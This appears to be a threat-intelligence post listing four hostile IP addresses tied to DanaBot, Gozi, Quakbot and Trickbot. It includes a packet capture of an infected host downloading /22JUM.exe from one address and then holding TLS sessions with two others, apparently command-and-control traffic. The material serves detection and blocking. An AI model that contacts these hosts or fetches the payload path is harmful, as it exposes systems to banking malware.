Hostile IPs:
176.123.7.51
185.45.193.50
193.34.166.247
95.163.181.123
Tags: DanaBot Gozi Quakbot Trickbot
2020-05-29 21:10:54.694365 IP 10.1.10.15.49218 > 176.123.7.51.80: Flags [P.], seq 1:506, ack 1, win 16425, length 505: HTTP: GET /22JUM.exe HTTP/1.1
GET /22JUM.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=202587-
Unless-Modified-Since: Sat, 30 May 2020 01:00:27 GMT
If-Range: "293800-5a6d31663c571"
Host: 176.123.7.51
Connection: Keep-Alive
2020-05-29 21:10:54.844053 IP 176.123.7.51.80 > 10.1.10.15.49218: Flags [.], ack 506, win 237, length 0
2020-05-29 21:10:54.846062 IP 176.123.7.51.80 > 10.1.10.15.49218: Flags [.], seq 1:1461, ack 506, win 237, length 1460: HTTP: HTTP/1.1 206 Partial Content
HTTP/1.1 206 Partial Content
Date: Sat, 30 May 2020 01:13:02 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Sat, 30 May 2020 01:00:27 GMT
ETag: "293800-5a6d31663c571"
Accept-Ranges: bytes
Content-Length: 2498725
Content-Range: bytes 202587-2701311/2701312
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
2020-05-29 21:10:51.631512 IP 95.163.181.123.80 > 10.1.10.15.49237: Flags [F.], seq 4233001886, ack 1745348952, win 388, length 0
2020-05-29 21:11:10.006491 IP 10.1.10.15.49219 > 185.45.193.50.443: Flags [S], seq 1886088581, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2020-05-29 21:11:10.105889 IP 185.45.193.50.443 > 10.1.10.15.49219: Flags [S.], seq 3218981652, ack 1886088582, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2020-05-29 21:11:10.106041 IP 10.1.10.15.49219 > 185.45.193.50.443: Flags [.], ack 1, win 16425, length 0
2020-05-29 21:11:10.291324 IP 10.1.10.15.49219 > 185.45.193.50.443: Flags [P.], seq 1:25, ack 1, win 16425, length 24
2020-05-29 21:11:10.427786 IP 185.45.193.50.443 > 10.1.10.15.49219: Flags [.], ack 25, win 256, length 0
2020-05-29 21:11:10.427918 IP 10.1.10.15.49219 > 185.45.193.50.443: Flags [P.], seq 25:649, ack 1, win 16425, length 624
2020-05-29 21:11:10.541774 IP 185.45.193.50.443 > 10.1.10.15.49219: Flags [P.], seq 1:25, ack 649, win 254, length 24
2020-05-29 21:11:10.781967 IP 10.1.10.15.49219 > 185.45.193.50.443: Flags [.], ack 25, win 16419, length 0
2020-05-29 21:11:10.877976 IP 185.45.193.50.443 > 10.1.10.15.49219: Flags [P.], seq 25:205, ack 649, win 254, length 180
2020-05-29 21:11:30.241391 IP 10.1.10.15.49220 > 193.34.166.247.443: Flags [P.], seq 25:649, ack 1, win 16425, length 624
2020-05-29 21:11:30.357339 IP 193.34.166.247.443 > 10.1.10.15.49220: Flags [P.], seq 1:25, ack 649, win 6145, length 24
2020-05-29 21:11:30.609624 IP 10.1.10.15.49220 > 193.34.166.247.443: Flags [.], ack 25, win 16419, length 0
2020-05-29 21:11:30.652687 IP 193.34.166.247.443 > 10.1.10.15.49220: Flags [P.], seq 1:205, ack 649, win 6145, length 204
2020-05-29 21:11:30.652824 IP 10.1.10.15.49220 > 193.34.166.247.443: Flags [.], ack 205, win 16374, options [nop,nop,sack 1 {1:25}], length 0
2020-05-29 21:11:30.677281 IP 10.1.10.15.49220 > 193.34.166.247.443: Flags [P.], seq 649:673, ack 205, win 16374, length 24
2020-05-29 21:11:30.703528 IP 193.34.166.247.443 > 10.1.10.15.49220: Flags [P.], seq 25:205, ack 649, win 6145, length 180
2020-05-29 21:11:30.703577 IP 10.1.10.15.49220 > 193.34.166.247.443: Flags [.], ack 205, win 16374, options [nop,nop,sack 1 {25:205}], length 0
2020-05-29 21:11:30.820514 IP 193.34.166.247.443 > 10.1.10.15.49220: Flags [.], ack 673, win 6145, length 0